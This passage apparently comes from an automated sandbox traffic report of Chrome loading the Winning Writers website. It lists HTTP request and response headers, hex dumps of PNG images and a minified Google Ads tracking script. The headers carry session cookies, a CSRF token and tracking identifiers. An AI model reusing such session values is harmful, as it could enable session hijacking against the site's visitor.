                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
                                                                                                                                                                                            2024-11-18 20:00:15 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:14 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:43 GMT
                                                                                                                                                                                            ETag: "4ae-578fd678e6ec0"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1198
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:14 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1198INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1b 00 00 00 0a 08 06 00 00 00 45 5e 25 6b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 b1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRE^%ktEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            115192.168.2.164985066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:14 UTC1184OUTGET /assets/images/slidecontrols.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
                                                                                                                                                                                            2024-11-18 20:00:15 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:15 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 22 Sep 2022 15:10:56 GMT
                                                                                                                                                                                            ETag: "bdf-5e94577e0b61d"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3039
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:15 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:15 UTC3039INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 76 00 00 00 3d 08 06 00 00 00 20 54 24 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 ee 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                                                                            Data Ascii: PNGIHDRv= T$pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            116192.168.2.1649847142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1423OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960013577&cv=11&fst=1731960013577&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:15 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:15 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:15 UTC675INData Raw: 31 33 31 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 1314(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:15 UTC83INData Raw: 44 45 4c 74 72 46 48 67 34 6c 63 58 5a 50 31 6d 31 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 34 39 34 30 33 36 32 33 33 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: DELtrFHg4lcXZP1m1\x26random\x3d494036233\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            117192.168.2.1649848142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1547OUTGET /td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:15 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:15 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:15 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            118192.168.2.164985366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:15 UTC927OUTGET /assets/images/slideshow-pager.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
                                                                                                                                                                                            2024-11-18 20:00:15 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:15 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:43 GMT
                                                                                                                                                                                            ETag: "4ae-578fd678e6ec0"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1198
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:15 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:15 UTC1198INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1b 00 00 00 0a 08 06 00 00 00 45 5e 25 6b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 b1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRE^%ktEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            119192.168.2.164985466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:15 UTC925OUTGET /assets/images/slidecontrols.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
                                                                                                                                                                                            2024-11-18 20:00:16 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:15 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 22 Sep 2022 15:10:56 GMT
                                                                                                                                                                                            ETag: "bdf-5e94577e0b61d"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3039
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:15 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
